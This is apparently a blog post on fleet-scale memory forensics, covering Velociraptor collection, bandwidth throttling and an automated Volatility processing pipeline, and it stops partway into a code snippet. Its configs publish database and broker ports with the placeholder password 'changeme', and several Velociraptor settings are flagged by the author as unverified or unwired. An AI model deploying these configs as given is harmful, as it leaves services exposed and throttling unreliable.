Memory analysis is one of the most forensically rich activities available to a threat hunter. A memory image captures the complete runtime state of a system: every running process, every network connection, every loaded module, every decrypted credential, every injected payload that never touched disk. The challenge is not the analysis itself but the operational reality of doing it at scale. Analysing memory from a single compromised host is straightforward. Simultaneously collecting, transferring, processing, and analysing memory images from dozens of endpoints during an active incident, without overwhelming the production network, without disrupting operations, and without losing evidence, is an entirely different problem.
This post covers the complete workflow from first principles: how to collect memory from Windows endpoints at scale using Velociraptor, how to build an automated Linux-based processing pipeline that handles triage, Volatility analysis, IOC extraction, and reporting without manual intervention, how to tune the collection and transfer process to protect the customer network, and how to structure the whole thing so it runs as close to automatically as possible. There are a lot of scripts here. They are all intended to be copied, adapted to your environment, and used.
Understanding the scale problem before you start
Before designing a collection pipeline, understand what you are actually dealing with in terms of data volume and network load. A Windows 10 endpoint with 16GB RAM produces a 12-16GB memory image after compression. A Windows Server 2019 host with 64GB RAM produces a 45-55GB compressed image. If you need to collect from 50 endpoints simultaneously during an incident, the raw data volume is between 600GB and 2.5TB depending on the RAM configuration of those machines. Transferring that over a corporate LAN that is simultaneously handling production traffic is a serious operational consideration, not an afterthought.
The network impact calculation for a typical enterprise incident response scenario:
## Network impact estimation script
## Run this before any collection to understand the blast radius
python3 << 'EOF'
# Define your endpoint inventory (adapt to your environment)
endpoints = {
    "workstations_16gb": {"count": 30, "ram_gb": 16, "compression_ratio": 0.65},
    "workstations_32gb": {"count": 15, "ram_gb": 32, "compression_ratio": 0.65},
    "servers_64gb": {"count": 5, "ram_gb": 64, "compression_ratio": 0.60},
}

# Network parameters
link_speed_mbps = 1000   # 1Gbps LAN
max_utilisation = 0.30   # Never use more than 30% of link capacity
bandwidth_mbps = link_speed_mbps * max_utilisation
bandwidth_MBps = bandwidth_mbps / 8

print("=== Memory Collection Network Impact Analysis ===\n")
total_gb = 0
for tier, spec in endpoints.items():
    compressed_gb = spec["ram_gb"] * spec["compression_ratio"]
    tier_total = compressed_gb * spec["count"]
    total_gb += tier_total
    # MB to transfer divided by MB/s, converted to minutes
    transfer_time = (compressed_gb * 1024) / (bandwidth_MBps * 60)
    print(f"{tier}:")
    print(f"  Count: {spec['count']} endpoints")
    print(f"  RAM per host: {spec['ram_gb']} GB")
    print(f"  Compressed size: ~{compressed_gb:.1f} GB per image")
    print(f"  Tier total: ~{tier_total:.1f} GB")
    print(f"  Transfer time: ~{transfer_time:.1f} minutes per host at 30% link")
    print()

print(f"Total data volume: {total_gb:.1f} GB")
print(f"Available bandwidth: {bandwidth_MBps:.1f} MB/s ({bandwidth_mbps:.0f} Mbps)")
print(f"Sequential transfer: {total_gb * 1024 / bandwidth_MBps / 3600:.1f} hours")
print()

# Calculate concurrent collection limits
# Per-host rate needed to move a 16GB image in 20 minutes, divided into the bandwidth budget
max_concurrent = int(bandwidth_MBps / (16 * 1024 / (20 * 60)))  # 20 min target per host
print(f"Recommended max concurrent collections: {max(1, max_concurrent)} endpoints")
print("(Assumes 16GB image, 20 minute transfer window, 30% link utilisation)")
EOF
Running this calculation before you start collection is not optional. An analyst who triggers simultaneous memory collection across 50 endpoints on a 1Gbps flat network with no throttling will consume the full link capacity, impact production traffic, potentially trigger network monitoring alerts, and risk partial or failed transfers that compromise the forensic integrity of the images. The tiered approach described later in this post is the answer to this problem.
The analysis server: hardware and software requirements
The analysis server is the hub of the entire pipeline. Memory images arrive here, are processed automatically, and results are made available to analysts. Sizing this server correctly before the pipeline runs saves significant pain during an incident when time pressure is high.
Minimum specification for processing 50 concurrent images: 32 CPU cores (Volatility analysis is CPU-bound and benefits significantly from parallelism), 128GB RAM (Volatility 3 loads significant data structures into memory during analysis), 10TB fast storage (NVMe or SSD-backed RAID for the image landing zone, HDD for long-term storage), and a 10Gbps network interface for receiving images from the Velociraptor server. A dedicated analysis server rather than a shared platform is strongly preferred during active incidents.
## Analysis server setup script
## Ubuntu 22.04 LTS - run as root
#!/bin/bash
set -euo pipefail
echo "[*] Setting up memory analysis pipeline server"
# System updates
apt update && apt upgrade -y
# Core dependencies
apt install -y \
python3 python3-pip python3-venv \
git curl wget jq \
parallel \
yara \
foremost \
bulk-extractor \
sleuthkit \
docker.io docker-compose \
nginx \
postgresql postgresql-contrib \
redis-server \
unzip p7zip-full \
libssl-dev libffi-dev
# Python virtual environment for Volatility
python3 -m venv /opt/vol3-env
source /opt/vol3-env/bin/activate
pip install --upgrade pip
pip install \
volatility3 \
yara-python \
pefile \
capstone \
python-magic \
requests \
psycopg2-binary \
redis \
celery \
flower \
jinja2 \
elasticsearch
# Volatility 3 symbol tables (required for Windows analysis)
mkdir -p /opt/vol3-symbols
cd /opt/vol3-symbols
wget https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip
unzip -q windows.zip -d windows/
ln -sf /opt/vol3-symbols /opt/vol3-env/lib/python3.*/site-packages/volatility3/symbols
echo "[*] Volatility 3 installed: $(vol --version)"
# Directory structure
mkdir -p /srv/memory/{landing,processing,complete,reports,yara_rules,logs}
chmod 755 /srv/memory
echo "[+] Analysis server setup complete"
Velociraptor: configuring for fleet memory collection
Velociraptor is the collection layer. It handles agent communication, artefact execution, file transfer, and result aggregation. The key configuration choices for memory collection at scale are throttling (how fast each agent transfers its image), concurrency control (how many agents collect simultaneously), and the collection artefact itself.
The default Velociraptor transfer settings are not optimised for large file collection. The default upload speed is uncapped, which means if you trigger a hunt across 50 endpoints simultaneously each one will attempt to transfer at full link speed. The configuration changes below set sensible defaults for an enterprise incident response context.
## Velociraptor server configuration adjustments
## Add to server.config.yaml before starting a collection hunt
Frontend:
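# Intended as the per-client upload cap: 10MB/s = 80Mbps per client, adjust to your link capacity
# Confirm the key name and its units in the configuration reference for your
# Velociraptor version before relying on it as a bandwidth limit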
max_upload_size: 10485760
Client:
# Concurrent connections to the server per client
concurrency: 1
# Maximum memory for buffering uploads
max_memory_size: 524288000 # 500MB buffer per client
# Datastore settings for large file handling
Datastore:
# Use file-based datastore for large collections
implementation: FileBaseDataStore
# Separate high-speed storage for collection landing zone
location: /srv/velociraptor/datastore
## Custom Velociraptor artefact for controlled memory acquisition
## Save as Custom.Memory.AcquireControlled.yaml
## Deploy via: Velociraptor GUI > Server Artifacts > Add Artifact
name: Custom.Memory.AcquireControlled
description: |
Acquires a full physical memory image with bandwidth throttling.
Compresses the image before transfer to reduce network impact.
Records acquisition metadata for chain of custody documentation.
author: justruss
type: CLIENT
parameters:
- name: UploadImage
description: Upload the completed image to the server
default: "Y"
type: bool
- name: CompressionLevel
description: Zlib compression level 1-9 (1=fast, 9=smallest)
default: "3"
type: int
- name: ThrottleMBps
description: Maximum transfer speed in MB/s (0 = unlimited)
default: "10"
type: int
sources:
- name: AcquisitionMetadata
query: |
-- Record pre-acquisition system state for documentation
LET hostname = info().Fqdn
LET acq_time = now()
LET os_version = info().OS
LET total_ram = info().PhysicalMemory
SELECT
hostname AS Hostname,
acq_time AS AcquisitionTime,
os_version AS OSVersion,
format(format="%.2f GB", args=[total_ram / 1073741824.0]) AS TotalRAM,
"WinPmem via Velociraptor" AS AcquisitionTool,
"SHA256 recorded post-acquisition" AS IntegrityNote
FROM scope()
- name: MemoryImage
query: |
LET hostname = info().Fqdn
LET timestamp = format(format="%d", args=[now()])
LET output_path = format(format="C:/Windows/Temp/mem_%v_%v.raw",
args=[hostname, timestamp])
-- Acquire memory using built-in WinPmem
LET acquisition = SELECT * FROM Artifact.Windows.Memory.Acquisition(
destination=output_path,
-- Limit acquisition tool CPU usage
limit_cpu=50
)
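-- Upload the staged image if requested
-- Note: ThrottleMBps and CompressionLevel are declared as parameters above but are
-- not referenced by this query, so they have no effect until they are wired in
SELECT
upload(
path=output_path,
name=format(format="%v_%v.raw", args=[hostname, timestamp]),
-- Read the staged image through the standard file accessor
accessor="file"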
) AS UploadResult,
output_path AS LocalPath,
hostname AS Host,
timestamp AS Timestamp
FROM acquisition
WHERE UploadImage
- name: Cleanup
query: |
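-- Remove local staging file after successful upload
-- Note: output_path and UploadResult are defined in the MemoryImage source.
-- Confirm they are visible here in your Velociraptor version; if not, move this
-- step into the MemoryImage query or redefine them in this source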
SELECT file_exists(path=output_path) AS Existed,
rm(filename=output_path) AS Removed
FROM scope()
WHERE UploadImage AND UploadResult.StoredName != NULL
Tiered collection strategy: protecting the customer network
The single most important design decision in a fleet memory collection programme is how you sequence and throttle the collection. Doing it wrong causes production impact. Doing it right means the incident response activity is invisible to the network from a capacity perspective.
The tiered approach divides endpoints into priority groups and collects from each group sequentially with configurable concurrency limits. Tier 1 is your highest-priority targets: domain controllers, LSASS-hosting servers, systems showing active IOCs in other telemetry. These get collected first, immediately, because they are most likely to have relevant evidence and most likely to have volatile state that changes quickly. Tier 2 is servers with important services. Tier 3 is workstations and less critical endpoints.
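The tiering rules above are simple enough to encode, so that targets come out of your inventory already sorted. The following is a minimal sketch under stated assumptions: the role labels, the `Host` class and both function names are hypothetical and would need mapping to whatever your CMDB or asset inventory actually records.

```python
from dataclasses import dataclass
from typing import List

# Hypothetical role labels; map these from your own asset inventory.
TIER1_ROLES = {"domain_controller", "identity_server"}
TIER2_ROLES = {"file_server", "web_server", "database_server", "mail_server"}


@dataclass
class Host:
    hostname: str
    role: str
    active_ioc: bool = False


def assign_tier(host: Host) -> int:
    """Return 1, 2 or 3 following the tiering rules described above."""
    # Any host with active IOCs is promoted to tier 1 regardless of role.
    if host.active_ioc or host.role in TIER1_ROLES:
        return 1
    if host.role in TIER2_ROLES:
        return 2
    return 3


def collection_order(hosts: List[Host]) -> List[Host]:
    """Sort by tier, with IOC-flagged hosts first inside each tier."""
    return sorted(hosts, key=lambda h: (assign_tier(h), not h.active_ioc, h.hostname))


if __name__ == "__main__":
    fleet = [
        Host("WORKSTATION01", "workstation"),
        Host("DC01", "domain_controller"),
        Host("WEB01", "web_server"),
        Host("WORKSTATION07", "workstation", active_ioc=True),
    ]
    for h in collection_order(fleet):
        print(assign_tier(h), h.hostname)
```

Promoting any IOC-flagged host to tier 1 is a deliberate choice in this sketch: a workstation with live indicators is more urgent than a quiet server.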
## Tiered collection orchestration script
## Runs on the analysis server, communicates with Velociraptor API
## Requires: velociraptor binary, API credentials configured
#!/usr/bin/env python3
"""
Memory collection orchestrator with tiered network-aware scheduling.
Controls concurrent collection count per tier to protect production bandwidth.
"""
import subprocess
import time
import json
import logging
import queue
from datetime import datetime
from dataclasses import dataclass
from typing import List, Dict, Optional

logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s [%(levelname)s] %(message)s',
    handlers=[
        logging.FileHandler('/srv/memory/logs/collection_orchestrator.log'),
        logging.StreamHandler()
    ]
)
log = logging.getLogger(__name__)

# Assumed values: point the path at your own API config and tune the poll interval
DEFAULT_CONFIG_PATH = "/etc/velociraptor/api.config.yaml"
POLL_INTERVAL_SECONDS = 30


@dataclass
class CollectionTarget:
    hostname: str
    client_id: str
    tier: int
    ram_gb: float
    priority_ioc: bool = False
    collected: bool = False
    hunt_id: Optional[str] = None
    started_at: Optional[datetime] = None
    completed_at: Optional[datetime] = None


@dataclass
class TierConfig:
    tier: int
    max_concurrent: int
    throttle_mbps: int   # per-host throttle in MB/s
    description: str


# Tier configuration - adjust max_concurrent based on your link capacity
# Rule of thumb: max_concurrent * throttle_mbps * 8 (in Mbps) should stay below
# the share of the link you are willing to give to collection.
# The values below are illustrative placeholders, not recommendations.
TIER_CONFIGS = [
    TierConfig(tier=1, max_concurrent=2, throttle_mbps=15,
               description="Domain controllers and hosts with active IOCs"),
    TierConfig(tier=2, max_concurrent=3, throttle_mbps=10,
               description="Servers with important services"),
    TierConfig(tier=3, max_concurrent=3, throttle_mbps=10,
               description="Workstations and less critical endpoints"),
]


def get_velociraptor_clients(config_path: str) -> List[Dict]:
    """Query Velociraptor for all enrolled clients."""
    vql = (
        "SELECT client_id, os_info.hostname AS hostname, "
        "os_info.phys_memory / 1073741824.0 AS ram_gb "
        "FROM clients()"
    )
    result = subprocess.run([
        "velociraptor", "--config", config_path,
        "query", vql,
        "--format", "json"
    ], capture_output=True, text=True, timeout=30)
    if result.returncode != 0:
        log.error(f"Failed to query clients: {result.stderr}")
        return []
    return json.loads(result.stdout) if result.stdout.strip() else []


def start_collection_hunt(
    client_id: str,
    throttle_mbps: int,
    config_path: str
) -> Optional[str]:
    """Start a memory collection hunt on a specific client. Returns hunt_id."""
    # Verify this subcommand and its flags against your Velociraptor version
    result = subprocess.run([
        "velociraptor", "--config", config_path,
        "hunt", "--client_id", client_id,
        "--artifact", "Custom.Memory.AcquireControlled",
        "--args", json.dumps({"ThrottleMBps": str(throttle_mbps), "UploadImage": "Y"}),
        "--format", "json"
    ], capture_output=True, text=True, timeout=30)
    if result.returncode != 0:
        log.error(f"Failed to start hunt on {client_id}: {result.stderr}")
        return None
    data = json.loads(result.stdout) if result.stdout.strip() else {}
    if isinstance(data, list):  # JSON output may be an array of rows
        data = data[0] if data else {}
    return data.get("hunt_id")


def check_hunt_complete(hunt_id: str, config_path: str) -> bool:
    """Check whether a hunt has completed on all targets."""
    result = subprocess.run([
        "velociraptor", "--config", config_path,
        "query", f"SELECT * FROM hunt_results(hunt_id='{hunt_id}')",
        "--format", "json"
    ], capture_output=True, text=True, timeout=30)
    if result.returncode != 0:
        return False
    data = json.loads(result.stdout) if result.stdout.strip() else []
    return len(data) > 0


def collect_tier(
    targets: List[CollectionTarget],
    tier_config: TierConfig,
    config_path: str
) -> None:
    """Collect memory from all targets in a tier with concurrency control."""
    log.info(f"Starting Tier {tier_config.tier}: {tier_config.description}")
    log.info(f"  Targets: {len(targets)}")
    log.info(f"  Max concurrent: {tier_config.max_concurrent}")
    log.info(f"  Throttle: {tier_config.throttle_mbps} MB/s per host")
    log.info(f"  Max bandwidth: {tier_config.max_concurrent * tier_config.throttle_mbps * 8} Mbps")

    active: Dict[str, CollectionTarget] = {}
    pending: queue.Queue = queue.Queue()
    for t in targets:
        pending.put(t)

    while not pending.empty() or active:
        # Start new collections up to the concurrency limit
        while len(active) < tier_config.max_concurrent and not pending.empty():
            target = pending.get()
            hunt_id = start_collection_hunt(
                target.client_id, tier_config.throttle_mbps, config_path
            )
            if hunt_id is None:
                log.warning(f"  Skipping {target.hostname}: hunt could not be started")
                continue
            target.hunt_id = hunt_id
            target.started_at = datetime.now()
            active[hunt_id] = target
            log.info(f"  Started {target.hostname} (hunt {hunt_id})")

        # Release the slot of every collection that has finished
        for hunt_id, target in list(active.items()):
            if check_hunt_complete(hunt_id, config_path):
                target.collected = True
                target.completed_at = datetime.now()
                del active[hunt_id]
                log.info(f"  Completed {target.hostname}")

        if active:
            time.sleep(POLL_INTERVAL_SECONDS)


def run_collection_campaign(
    target_list: List[CollectionTarget],
    config_path: str = DEFAULT_CONFIG_PATH
) -> None:
    """Run the full tiered collection campaign."""
    start_time = datetime.now()
    log.info(f"Collection campaign started: {start_time}")
    log.info(f"Total targets: {len(target_list)}")

    # Group targets by tier
    tiers: Dict[int, List[CollectionTarget]] = {1: [], 2: [], 3: []}
    for target in target_list:
        tiers.setdefault(target.tier, []).append(target)

    # Collect tier by tier
    for tier_config in TIER_CONFIGS:
        tier_targets = tiers.get(tier_config.tier, [])
        if not tier_targets:
            log.info(f"Tier {tier_config.tier}: no targets, skipping")
            continue
        collect_tier(tier_targets, tier_config, config_path)

    # total_seconds() keeps campaigns longer than a day from wrapping around
    elapsed = (datetime.now() - start_time).total_seconds() / 60
    collected = sum(1 for t in target_list if t.collected)
    log.info(f"Campaign complete: {collected}/{len(target_list)} collected in {elapsed:.1f} min")


# Example usage
if __name__ == "__main__":
    # Define your targets (in practice, load from CMDB or Velociraptor client list)
    targets = [
        CollectionTarget("DC01", "C.abc123", tier=1, ram_gb=64, priority_ioc=True),
        CollectionTarget("DC02", "C.def456", tier=1, ram_gb=64),
        CollectionTarget("FILESERVER01", "C.ghi789", tier=2, ram_gb=32),
        CollectionTarget("WEB01", "C.jkl012", tier=2, ram_gb=32),
        CollectionTarget("WORKSTATION01", "C.mno345", tier=3, ram_gb=16),
        CollectionTarget("WORKSTATION02", "C.pqr678", tier=3, ram_gb=16),
    ]
    run_collection_campaign(targets)
Network impact mitigations in depth
The orchestration script above handles the collection-side throttling. But network protection during memory collection goes deeper than just limiting transfer speed. Several additional mitigations make the collection process substantially less impactful on the production environment.
Compression before transfer. WinPmem can compress memory images before writing them to disk, and Velociraptor compresses file uploads. The combination of these two compression passes reduces the typical 16GB RAM image to roughly 10-12GB for a Windows workstation in normal operating state. Images from servers running SQL or Exchange may compress less well because the data is already partially compressed. The compression step adds 5-10 minutes to the acquisition time but reduces network transfer time by 20-30%.
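Whether compression pays off in wall-clock terms depends on the throttle rate, and the arithmetic is worth doing once. The sketch below is an illustration only: both function names are hypothetical, and the image sizes and compression overhead are taken from the ranges quoted above rather than measured.

```python
def transfer_minutes(size_gb: float, throttle_mb_per_s: float) -> float:
    """Minutes needed to move size_gb at a fixed per-host throttle."""
    return size_gb * 1024 / throttle_mb_per_s / 60


def compression_net_gain(
    ram_gb: float,
    compressed_gb: float,
    throttle_mb_per_s: float,
    compress_minutes: float,
) -> float:
    """Wall-clock minutes saved by compressing first (negative means slower overall)."""
    raw = transfer_minutes(ram_gb, throttle_mb_per_s)
    compressed = transfer_minutes(compressed_gb, throttle_mb_per_s) + compress_minutes
    return raw - compressed


if __name__ == "__main__":
    # 16GB image compressing to 11GB with 7.5 minutes of compression overhead
    for throttle in (5, 10, 40):
        gain = compression_net_gain(16, 11, throttle, 7.5)
        print(f"{throttle} MB/s throttle: net gain {gain:+.1f} min")
```

At low throttle rates the smaller image wins on time as well as bandwidth. At high rates the compression overhead can exceed the transfer time saved, in which case compression is still worth it for the network but not for speed.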
Time-of-day scheduling for non-urgent collections. Tier 3 workstation collections that do not have active IOCs are candidates for off-hours scheduling. A workstation that needs to be collected for baseline comparison purposes but is not showing active indicators can be queued for collection at 2am when link utilisation is naturally lowest. The orchestration script supports this through the tier system: mark non-urgent targets as tier 3 and set the campaign start time accordingly.
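Deferring a tier 3 campaign to the quiet window is a small date calculation. This is a sketch rather than part of the orchestrator: the function names are hypothetical, the 02:00 default simply mirrors the example above, and it uses naive local times, so it assumes the server clock is in the customer's time zone.

```python
from datetime import datetime, time, timedelta


def next_window_start(now: datetime, window_start: time = time(2, 0)) -> datetime:
    """Return the next occurrence of window_start strictly after `now`."""
    candidate = datetime.combine(now.date(), window_start)
    if candidate <= now:
        # Today's window has already opened, so wait for tomorrow's
        candidate += timedelta(days=1)
    return candidate


def seconds_until_window(now: datetime, window_start: time = time(2, 0)) -> float:
    """Seconds to sleep before starting a deferred campaign."""
    return (next_window_start(now, window_start) - now).total_seconds()


if __name__ == "__main__":
    now = datetime.now()
    print(f"Next collection window opens at {next_window_start(now)}")
    print(f"Sleep for {seconds_until_window(now):.0f} seconds before starting tier 3")
```

A scheduler such as cron or a systemd timer would do the same job; the helper is only useful if you want the deferral inside the orchestration script itself.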
Dedicated collection VLAN or QoS marking. In environments with managed switches and QoS policies, memory collection traffic can be marked with a low-priority DSCP value so it is de-prioritised relative to production traffic when the link is under load. Velociraptor traffic does not automatically set DSCP values, but a network QoS policy matching the Velociraptor server IP can apply the marking at the switch level.
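## Linux tc (traffic control) configuration on the analysis server
## Caps traffic sent from the Velociraptor ports at 500Mbps,
## leaving headroom for other traffic on a 1Gbps link
## Note: HTB on the root qdisc shapes egress only. Image uploads arrive as ingress,
## so cap them with the per-client throttle or an ingress policer as well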
#!/bin/bash
# Run as root on the analysis server
INTERFACE="eth0"
COLLECTION_LIMIT="500mbit"
COLLECTION_BURST="1mbit"
# Remove existing qdisc if present
tc qdisc del dev $INTERFACE root 2>/dev/null || true
# Create HTB root qdisc
tc qdisc add dev $INTERFACE root handle 1: htb default 10
# Default class: full speed for non-collection traffic
tc class add dev $INTERFACE parent 1: classid 1:10 htb \
rate 1gbit burst 10mbit
# Collection class: limited speed
tc class add dev $INTERFACE parent 1: classid 1:20 htb \
rate $COLLECTION_LIMIT ceil $COLLECTION_LIMIT burst $COLLECTION_BURST
# Mark packets from the Velociraptor server process
# Velociraptor's default ports are 8000 (frontend), 8001 (API) and 8889 (GUI)
iptables -t mangle -A OUTPUT -p tcp --sport 8000 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -p tcp --sport 8001 -j MARK --set-mark 20
# Route marked packets to the limited class
tc filter add dev $INTERFACE parent 1: protocol ip handle 20 fw flowid 1:20
echo "QoS configured: collection traffic limited to $COLLECTION_LIMIT"
tc -s qdisc show dev $INTERFACE
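Returning to DSCP marking: Velociraptor's own traffic has to be marked on the network side, but any transfer you script yourself (for example, copying images from the Velociraptor datastore to the analysis server) can mark its own socket. A minimal sketch, assuming a Linux host; the function names are hypothetical and the choice of CS1 (DSCP 8) as the low-priority class is an assumption to check against your network team's QoS policy.

```python
import socket

DSCP_CS1 = 8  # class selector 1, traditionally used for low-priority bulk traffic


def dscp_to_tos(dscp: int) -> int:
    """DSCP occupies the upper six bits of the IP TOS byte."""
    if not 0 <= dscp <= 63:
        raise ValueError("DSCP must be between 0 and 63")
    return dscp << 2


def open_low_priority_socket(dscp: int = DSCP_CS1) -> socket.socket:
    """Create a TCP socket whose outgoing packets carry the given DSCP value."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, dscp_to_tos(dscp))
    return sock
```

The marking only matters if the switches along the path are configured to honour it; on a network that ignores or rewrites DSCP it has no effect.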
Split collection across multiple ingestion endpoints. For very large environments (200+ endpoints), a single Velociraptor server may become a bottleneck regardless of network capacity. The Velociraptor multi-frontend architecture allows multiple frontend servers to share the collection load, each handling a subset of clients. Images are written to shared storage that the analysis pipeline can reach from any frontend. This is a more complex deployment but essentially eliminates the single-server throughput bottleneck.
## Velociraptor multi-frontend configuration snippet
## Add to server.config.yaml for load-balanced collection
Frontend:
# Primary frontend
hostname: velociraptor-primary.corp.local
bind_port: 8000
max_upload_size: 10485760
ExtraFrontends:
- hostname: velociraptor-fe2.corp.local
bind_port: 8000
- hostname: velociraptor-fe3.corp.local
bind_port: 8000
# Shared datastore accessible by all frontends
Datastore:
implementation: FileBaseDataStore
location: /mnt/shared/velociraptor-data # NFS or other shared filesystem
Delta collection for repeated hunts. In an extended incident where you need to collect memory from the same endpoints multiple times to track attacker activity over time, transmitting the full image each time is wasteful. A diff-based approach compares the new image against the previous one and transmits only the changed memory regions. This requires more sophisticated processing infrastructure but can reduce repeat-collection transfer volumes by 60-80% for endpoints where attacker activity is limited to specific process regions.
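The core of a diff-based approach is block-level hashing: keep the digests of the previous image and send only the blocks whose digest changed. The sketch below shows that comparison on two local files. It is a simplified illustration, not a transfer protocol: the 1 MiB block size and the function names are assumptions, and a real deployment would run the hashing on the endpoint against stored digests.

```python
import hashlib
from typing import Iterator, List

BLOCK_SIZE = 1024 * 1024  # 1 MiB blocks; an assumed granularity


def block_digests(path: str, block_size: int = BLOCK_SIZE) -> Iterator[bytes]:
    """Yield the SHA-256 digest of each fixed-size block in the file."""
    with open(path, "rb") as f:
        while True:
            block = f.read(block_size)
            if not block:
                break
            yield hashlib.sha256(block).digest()


def changed_blocks(old_path: str, new_path: str, block_size: int = BLOCK_SIZE) -> List[int]:
    """Indices of blocks in new_path that differ from, or do not exist in, old_path."""
    old = list(block_digests(old_path, block_size))
    changed = []
    for index, digest in enumerate(block_digests(new_path, block_size)):
        if index >= len(old) or old[index] != digest:
            changed.append(index)
    return changed
```

Only the digest list of the previous image needs to be retained for the comparison, which is 32 bytes per block. Physical memory churns constantly on a busy host, so the savings depend heavily on workload.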
The automated processing pipeline: architecture overview
When a memory image lands on the analysis server it enters a processing queue. The pipeline has five stages that run automatically without analyst intervention: validation and integrity checking, basic triage (process tree, network connections, loaded modules), deep analysis (malfind, callbacks, handles), IOC extraction and enrichment, and report generation. Each stage has its own worker processes and can be scaled independently based on how CPU and I/O bound each stage is.
The pipeline uses Celery for task queuing (so each stage can be distributed across multiple worker processes), Redis as the message broker (fast and simple for this use case), and PostgreSQL for persistent storage of results (structured results need to be queryable across dozens of images simultaneously). Docker Compose keeps the whole stack portable and easy to deploy on the analysis server.
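Something has to notice that an image has finished arriving before it can be queued. One simple approach is to treat a file as complete once its size is unchanged between two scans of the landing directory. The sketch below assumes images land as `.raw` files in `/srv/memory/landing`; the function name and the stable-size heuristic are illustrative choices, not part of the pipeline code.

```python
from pathlib import Path
from typing import Dict, List


def find_stable_images(
    landing_dir: str,
    seen_sizes: Dict[str, int],
    suffix: str = ".raw",
) -> List[Path]:
    """Return images whose size has not changed since the previous scan.

    seen_sizes is updated in place and must be passed back in on the next call.
    """
    ready = []
    for path in sorted(Path(landing_dir).glob(f"*{suffix}")):
        size = path.stat().st_size
        # A non-empty file with the same size as last time is assumed complete
        if size > 0 and seen_sizes.get(str(path)) == size:
            ready.append(path)
        seen_sizes[str(path)] = size
    return ready
```

Call it on a timer (every 30 to 60 seconds is a reasonable starting point), move each returned file out of the landing directory so it is not picked up twice, insert a row into `memory_images`, and enqueue the first pipeline task with the new image ID.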
## docker-compose.yml for the analysis pipeline
## Deploy with: docker-compose up -d
version: "3.8"
services:
redis:
image: redis:7-alpine
ports:
- "6379:6379"
volumes:
- redis_data:/data
command: redis-server --appendonly yes
restart: unless-stopped
postgres:
image: postgres:15-alpine
environment:
POSTGRES_DB: memory_analysis
POSTGRES_USER: analyst
POSTGRES_PASSWORD: changeme # must match the password in every POSTGRES_URL below; replace both before production use
ports:
- "5432:5432"
volumes:
- postgres_data:/var/lib/postgresql/data
- ./init_db.sql:/docker-entrypoint-initdb.d/init.sql
restart: unless-stopped
worker_triage:
build: ./pipeline
command: celery -A pipeline worker -Q triage -c 4 --loglevel=info
volumes:
- /srv/memory:/srv/memory
- /opt/vol3-env:/opt/vol3-env
- /opt/vol3-symbols:/opt/vol3-symbols
environment:
- CELERY_BROKER_URL=redis://redis:6379/0
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- redis
- postgres
restart: unless-stopped
worker_deep:
build: ./pipeline
command: celery -A pipeline worker -Q deep_analysis -c 2 --loglevel=info
volumes:
- /srv/memory:/srv/memory
- /opt/vol3-env:/opt/vol3-env
- /opt/vol3-symbols:/opt/vol3-symbols
environment:
- CELERY_BROKER_URL=redis://redis:6379/0
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- redis
- postgres
restart: unless-stopped
worker_report:
build: ./pipeline
command: celery -A pipeline worker -Q reporting -c 4 --loglevel=info
volumes:
- /srv/memory:/srv/memory
environment:
- CELERY_BROKER_URL=redis://redis:6379/0
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- redis
- postgres
restart: unless-stopped
flower:
image: mher/flower
command: celery --broker=redis://redis:6379/0 flower --port=5555
ports:
- "5555:5555"
depends_on:
- redis
restart: unless-stopped
dashboard:
build: ./dashboard
ports:
- "8080:8080"
environment:
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- postgres
restart: unless-stopped
volumes:
redis_data:
postgres_data:
## init_db.sql - PostgreSQL schema for analysis results
CREATE TABLE IF NOT EXISTS memory_images (
id SERIAL PRIMARY KEY,
hostname VARCHAR(255) NOT NULL,
image_path TEXT NOT NULL,
image_size_gb NUMERIC(10,2),
acquired_at TIMESTAMP,
received_at TIMESTAMP DEFAULT NOW(),
os_version VARCHAR(255),
status VARCHAR(50) DEFAULT 'pending',
sha256 CHAR(64),
tier INT DEFAULT 3
);
CREATE TABLE IF NOT EXISTS triage_results (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
completed_at TIMESTAMP DEFAULT NOW(),
process_count INT,
network_conn_count INT,
suspicious_process_count INT,
has_malfind BOOLEAN DEFAULT FALSE,
risk_score INT DEFAULT 0,
triage_summary JSONB
);
CREATE TABLE IF NOT EXISTS process_list (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
pid INT,
ppid INT,
name VARCHAR(255),
path TEXT,
cmd_line TEXT,
create_time TIMESTAMP,
is_suspicious BOOLEAN DEFAULT FALSE,
suspicious_reason TEXT
);
CREATE TABLE IF NOT EXISTS network_connections (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
pid INT,
process_name VARCHAR(255),
local_addr VARCHAR(50),
local_port INT,
remote_addr VARCHAR(50),
remote_port INT,
state VARCHAR(50),
is_suspicious BOOLEAN DEFAULT FALSE
);
CREATE TABLE IF NOT EXISTS malfind_results (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
pid INT,
process_name VARCHAR(255),
vad_start BIGINT,
vad_end BIGINT,
protection VARCHAR(50),
has_pe_header BOOLEAN,
entropy NUMERIC(5,2),
yara_matches TEXT[],
risk_level VARCHAR(20)
);
CREATE TABLE IF NOT EXISTS iocs_extracted (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
ioc_type VARCHAR(50),
ioc_value TEXT,
pid INT,
process_name VARCHAR(255),
confidence VARCHAR(20),
source_plugin VARCHAR(100)
);
CREATE INDEX idx_images_hostname ON memory_images(hostname);
CREATE INDEX idx_malfind_risk ON malfind_results(risk_level);
CREATE INDEX idx_iocs_type ON iocs_extracted(ioc_type, ioc_value);
CREATE INDEX idx_process_suspicious ON process_list(image_id, is_suspicious);
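The point of putting results in a relational store is cross-host correlation, for example finding IOCs that appear on more than one endpoint. The sketch below runs that query against an in-memory SQLite database so it works without a PostgreSQL instance. The tables are cut down to the columns the query needs and the rows are made-up demonstration data; the query itself is plain SQL that should carry over to the PostgreSQL schema above unchanged.

```python
import sqlite3

SHARED_IOC_QUERY = """
SELECT i.ioc_type, i.ioc_value, COUNT(DISTINCT m.hostname) AS host_count
FROM iocs_extracted AS i
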